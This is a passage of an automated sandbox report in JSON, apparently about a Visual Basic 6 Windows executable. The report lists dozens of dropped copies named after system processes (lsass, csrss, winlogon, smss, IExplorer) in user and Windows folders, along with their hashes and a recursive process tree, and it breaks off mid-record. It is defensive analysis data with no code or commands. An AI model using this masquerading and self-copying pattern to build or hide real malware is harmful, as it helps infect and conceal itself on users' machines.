"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%LOCALAPPDATA%\\D3_08.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\LSASS.EXE", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\SERVICES.EXE", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\SMSS.EXE", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163872, "sha256": "8771f11f3acb24bcde587d99c84e04df042a2ee1ff43006c192aa928d8851e39", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163872, "sha256": "4aa156ecbe9be4aea41fe89ea143b9ff2763e32342aac336d1f625691b9c597d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163872, "sha256": "3e8d3cc7fd73c2896362c3ad4189ab18d60f75d4a0e93069f854ef4698a90dba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163872, "sha256": "7844ed57dc285ad7b13c627fc93a1f42b155b3e7d6adef8383184960f63823a8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163872, "sha256": "5acf6c7cfdc958aa419760745929ce1b1402e1c2b3d2f110e2a16b9027f784ed", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": "%LOCALAPPDATA%\\smss.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 163872, "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163872, "sha256": "99c4a2b34aaebb711dd92635f36f68ee7fa71a99eb387c96aef0218bfbb6520d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163872, "sha256": "fcfa9f16c0deb5cdfe0c69cd913fc469621a021ae99f67e94518b8c2a10f8229", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163872, "sha256": "a099107ec4f9ccccd6e597fb22bf310bd0f40d2ceeeb1afa7598b0acec41886a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163872, "sha256": "8d00191521d8b0abf16c26fb0ef318a78dbd85568e90b32e13089034722b723e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\D3_08\\New Folder.exe", "file_size": 163872, "sha256": "2362d027f18392fbd457b6aad28059bd84d72898c45427e5d8a6078dd2a02fc1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 163872, "sha256": "cd7bcddf3073759caf4ab655c1a977790c3cef1e90bc7c10c8870b7499e2b9ad", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe (PID: 960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 46728, "sha256": "f41519d2d5d68c7be34e6d0a20e48ac887fdcc3a48346a3fdab1202f34d9ebae", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 163872, "sha256": "5acf6c7cfdc958aa419760745929ce1b1402e1c2b3d2f110e2a16b9027f784ed", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4B9B.bin", "file_size": 163872, "sha256": "fcfa9f16c0deb5cdfe0c69cd913fc469621a021ae99f67e94518b8c2a10f8229", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163872, "sha256": "8771f11f3acb24bcde587d99c84e04df042a2ee1ff43006c192aa928d8851e39", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4669.bin", "file_size": 163872, "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4A8B.bin", "file_size": 163872, "sha256": "04f13531d57b412dd2b9ffa614698367485c5852c33d1502dd83b346d2485a22", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4667.bin", "file_size": 163872, "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4A8E.bin", "file_size": 163872, "sha256": "bd8a8aed932f7149f942a3c01158919b4bde2528222df4c732fe0593e3ffe15a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4AE3.bin", "file_size": 163872, "sha256": "99c4a2b34aaebb711dd92635f36f68ee7fa71a99eb387c96aef0218bfbb6520d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00000960", "name": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe", "normalized_path": "C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe", "sha256": "019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6"}, {"uid": "00000000-00005992", "parentuid": "00000000-00000960", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00005496", "parentuid": "00000000-00005992", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00005836", "parentuid": "00000000-00005992", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00005588", "parentuid": "00000000-00005992", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00001440", "parentuid": "00000000-00005992", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00003332", "parentuid": "00000000-00005992", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00003616", "parentuid": "00000000-00003332", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00003792", "parentuid": "00000000-00003332", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00003648", "parentuid": "00000000-00003332", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00003856", "parentuid": "00000000-00003332", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00004180", "parentuid": "00000000-00003332", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00002784", "parentuid": "00000000-00003332", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00002160", "parentuid": "00000000-00003332", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00001364", "parentuid": "00000000-00003332", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "04f13531d57b412dd2b9ffa614698367485c5852c33d1502dd83b346d2485a22"}, {"uid": "00000000-00004248", "parentuid": "00000000-00005992", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00004268", "parentuid": "00000000-00005992", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00003824", "parentuid": "00000000-00004268", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00001708", "parentuid": "00000000-00004268", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00000416", "parentuid": "00000000-00004268", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00002496", "parentuid": "00000000-00004268", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00004668", "parentuid": "00000000-00004268", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00003196", "parentuid": "00000000-00004268", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00004488", "parentuid": "00000000-00004268", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00001712", "parentuid": "00000000-00000960", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00005808", "parentuid": "00000000-00001712", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00004400", "parentuid": "00000000-00001712", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00000964", "parentuid": "00000000-00001712", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00006052", "parentuid": "00000000-00001712", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00003580", "parentuid": "00000000-00001712", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00003456", "parentuid": "00000000-00001712", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00004416", "parentuid": "00000000-00001712", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00005792", "parentuid": "00000000-00000960", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00000756", "parentuid": "00000000-00005792", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00004188", "parentuid": "00000000-00005792", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00004308", "parentuid": "00000000-00005792", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00004580", "parentuid": "00000000-00005792", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00004500", "parentuid": "00000000-00005792", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00002176", "parentuid": "00000000-00005792", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00004104", "parentuid": "00000000-00005792", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00005760", "parentuid": "00000000-00000960", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00006084", "parentuid": "00000000-00005760", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00001880", "parentuid": "00000000-00005760", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00002728", "parentuid": "00000000-00005760", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00004512", "parentuid": "00000000-00005760", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00000272", "parentuid": "00000000-00005760", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00000296", "parentuid": "00000000-00005760", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00003812", "parentuid": "00000000-00005760", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00005724", "parentuid": "00000000-00000960", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00004392", "parentuid": "00000000-00000960", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00003476", "parentuid": "00000000-00004392", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "4ecc7ddd291dffdf452ce8739e3f65c78a1bf8e7d1ba9612a56b016e911902d2"}, {"uid": "00000000-00006056", "parentuid": "00000000-00004392", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "0b4d4fc894e2883efb08223218ede849cafdbffb3b346ce31ed7007f06657ac2"}, {"uid": "00000000-00001888", "parentuid": "00000000-00004392", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3885307b64cd31690872e92aca9f550e974c013c015bc4c5949989126de8399b"}, {"uid": "00000000-00003880", "parentuid": "00000000-00004392", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "18f5ac7cdd9a669a919b06bc3c90cd82f3d11ae04149fc42b3b2406743c2effb"}, {"uid": "00000000-00003012", "parentuid": "00000000-00004392", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "18e5de8d36b8f003c07d44bbd6f4f300ef0ae39f87dbccc95c0c100fb04b26f8"}, {"uid": "00000000-00002640", "parentuid": "00000000-00004392", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb329c6d960b6ba2ddffab7c023b86977a76c0db54c93a677a3ec86524e6dc3"}, {"uid": "00000000-00004652", "parentuid": "00000000-00004392", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00001232", "parentuid": "00000000-00004392", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "04f13531d57b412dd2b9ffa614698367485c5852c33d1502dd83b346d2485a22"}, {"uid": "00000000-00004240", "parentuid": "00000000-00000960", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "500be2344b8aedfc54f007b7e0bd2d7b36337573f81ac9ec0283c23715f4a1d7"}, {"uid": "00000000-00002556", "parentuid": "00000000-00000960", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "04f13531d57b412dd2b9ffa614698367485c5852c33d1502dd83b346d2485a22"}, {"uid": "00000000-00003468", "parentuid": "00000000-00002556", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "04f13531d57b412dd2b9ffa614698367485c5852c33d1502dd83b346d2485a22"}, {"uid": "00000000-00003668", "parentuid": "00000000-00002556", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "bd8a8aed932f7149f942a3c01158919b4bde2528222df4c732fe0593e3ffe15a"}, {"uid": "00000000-00004000", "parentuid": "00000000-00002556", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "02f0ce3ae037051563bc7529359980975580e35685db2eda66b41fcc5dc577d0"}, {"uid": "00000000-00002096", "parentuid": 